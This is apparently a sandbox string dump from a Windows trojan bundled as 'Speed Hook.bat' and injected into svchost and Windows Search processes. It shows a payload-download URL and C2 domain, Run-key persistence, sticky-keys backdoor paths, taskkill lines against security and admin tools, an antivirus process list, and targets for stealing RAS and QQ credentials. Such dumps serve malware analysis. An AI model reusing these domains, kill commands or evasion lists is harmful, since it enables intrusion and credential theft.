/></dependentAssembly></dependency></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
1, 0, 6, 6
- Skin.dll
oU@03.BZq
(*.*)
1.0.0.0
VVV.facebook.com/hkchenme
Noodles V1.1.exe_3712_rwx_10000000_0003E000:
`.rsrc
L$(h%f
SSh0j
hu2.iu
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
1, 0, 6, 6
- Skin.dll
Noodles V1.1.exe_3712_rwx_20020000_00001000:
.text
`.rdata
@.data
.reloc
Speed Hook.bat_1464:
`.rsrc
62738495:6
;7<8=9> ?
k4.Zh
D$%SS
hXXp://mm.cnxc.tk/mm/kj.jpg
%Program Files%\AppPatch\kj.dll
[%%Sw9`
GetProcessHeap
_acmdln
InternetOpenUrlA
.text
`.rdata
@.data
.rsrc
KERNEL32.DLL
imagehlp.dll
MSVCRT.dll
WININET.dll
1, 2, 205, 38287
2017-02-16
Speed Hook.bat_1464_rwx_00401000_0000F000:
D$%SS
hXXp://mm.cnxc.tk/mm/kj.jpg
%Program Files%\AppPatch\kj.dll
[%%Sw9`
GetProcessHeap
_acmdln
InternetOpenUrlA
.text
`.rdata
@.data
.rsrc
Speed Hook.bat_1464_rwx_10001000_00348000:
D$%SS
t;Jt%UQJPSt
@43434343
ku2.iu
deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
inflate 1.1.4 Copyright 1995-2002 Mark Adler
This software is derived from the GNU GPL XviD codec (1.3.0).
Software\Microsoft\Windows\CurrentVersion\run
\StringFileInfo\%s\CompanyName
000%x
Software\Microsoft\Windows\CurrentVersion\Run
%d * %d:
(%d-d-d d:d:d)
<%s> %s
%d.%d.%d.%d
Ourlog
%s\*.*
%s%s%s
%s%s*.*
%Y-%m-%d %H:%M
%s : %u
InternalGetUdpTableWithOwnerPid
AllocateAndGetUdpExTableFromStack
InternalGetTcpTable2
AllocateAndGetTcpExTableFromStack
%d-%d-%d %d:%d:%d
hXXp://
\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
\Local Settings\History\History.IE5\index.dat
%Y-%m-%d %H:%M:%S
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\*.url
%sDocuments and Settings\%s\Favorites
%sUsers\%s\Favorites
192.168.1.2
Http/1.1 403 Forbidden
HTTP/1.0 200 OK
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
:] %s
:] %d-%d-%d %d:%d:%d
%s\dllcache\magnify.exe
%s\dllcache\osk.exe
%s\dllcache\sethc.exe
%s\magnify.exe
%s\osk.exe
%s\sethc.exe
\dllcache\termsrvhack.dll
\termsrvhack.dll
%SystemRoot%\system32\termsrvhack.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
%s%s %s%s
jingtisanmenxiachuanxiao.vbs
TSDISCON %s
LOGOFF %s
taskkill /f /im cmd.exe
cmd.exe
taskkill /f /im taskmgr.exe
taskmgr.exe
taskkill /f /im regedit.exe
regedit.exe
taskkill /f /im mmc.exe
mmc.exe
taskkill /f /im mstsc.exe
mstsc.exe
taskkill /f /im QQ.exe
QQ.exe
taskkill /f /im Maxthon.exe
Maxthon.exe
taskkill /f /im Firefox.exe
Firefox.exe
taskkill /f /im Chrome.exe
Chrome.exe
taskkill /f /im sogouexplorer.exe
sogouexplorer.exe
taskkill /f /im 360SE.exe
360SE.exe
taskkill /f /im IEXPLORE.exe
IEXPLORE.exe
taskkill /f /im s.exe
s.exe
PortNumber
%d/%d
\cmd.exe
explorer.exe
All Users\Microsoft\Network\Connections\Pbk\rasphone.pbk
Microsoft\Network\Connections\pbk\rasphone.pbk
Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk
%s\%s
AppData\Roaming\Microsoft\Network\Connections\pbk\rasphone.pbk
%USERPROFILE%
RasDialParams!%s#0
Iphlpapi.dll
rasphone.pbk
\Application Data\Tencent\Users\*.*
\AppData\Roaming\Tencent\Users\*.*
/IP (%s)
Net123.dat
mgui.exe
mcagent.exe
Pavsrv50.exe
SHesvchost.exe
onlinent.exe
pasvc.exe
fsaa.exe
vba32ldr.exe
spider.exe
ccapp.exe
bdnagent.exe
MsMpEng.exe
v3lsvc.exe
AYAgent.aye
avgui.exe
baidusdSvc.exe
QQPCRTP.exe
ksafe.exe
rtvscan.exe
ashDisp.exe
avcenter.exe
pccmain.exe
knsdtray.exe
kxetray.exe
egui.exe
Mcshield.exe
RavMonD.exe
KvMonXP.exe
avp.exe
360sd.exe
360tray.exe
%d %c %d
1.1.4
xvid-1.3.2
%d st:%lld if:%d
XviDd%c
%Program Files%\Microsoft Fkfygh
1789449760
yk.cnxc.tk
%Program Files%\Microsoft Fkfygh\Speed Hook.bat
hXXp://user.qzone.qq.com/%s
hXXp://VVV.ip138.com/ips138.asp?ip=%s&action=2
hXXp://dns.aizhan.com/?q=%s
Speed Hook.bat
2017-09-05 09:00
C:\Windows\Speed Hook.dat
~~}}}~~}}}
PeekNamedPipe
DisconnectNamedPipe
CreatePipe
WinExec
GetProcessHeap
GetWindowsDirectoryA
RegCreateKeyA
RegQueryInfoKeyA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyExA
RegCloseKey
ShellExecuteA
MapVirtualKeyA
keybd_event
UnhookWindowsHookEx
SetWindowsHookExA
GetKeyState
ExitWindowsEx
EnumWindows
InternetOpenUrlA
.text
`.rodata
`.rotext
`.rdata
@.data
.rsrc
@.reloc
`.rom
@.Mx(.
""""$$$$&&&&((((****,,,,....00002222444466668888::::<<<<>>>>
#*1892 $
%,3:;4-&
'.5<=6/7>?
"#()01* $%&',-./2389:;4567<=>?
"*2:# 3;
$,4<%-5=
&.6>'/7?
iphlpapi.dll
lIngress.exe
arpguard.exe
zrclient.exe
zrupdate.exe
zreboot.exe
This user account is used by the Visual Studio .NET Debugger
svchost.exe_2896:
.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385
Speed Hook.bat_1464_rwx_20020000_00001000:
.text
`.rdata
@.data
.reloc
SearchProtocolHost.exe_2144:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610
SearchFilterHost.exe_4020:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610
svchost.exe_2896_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2896_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2896_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2896_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2896_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2896_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2896_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2896_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2896_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2896_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2896_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2896_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_2896_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchProtocolHost.exe_2144_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchProtocolHost.exe_2144_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchProtocolHost.exe_2144_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchProtocolHost.exe_2144_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchFilterHost.exe_4020_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchFilterHost.exe_4020_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchFilterHost.exe_4020_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
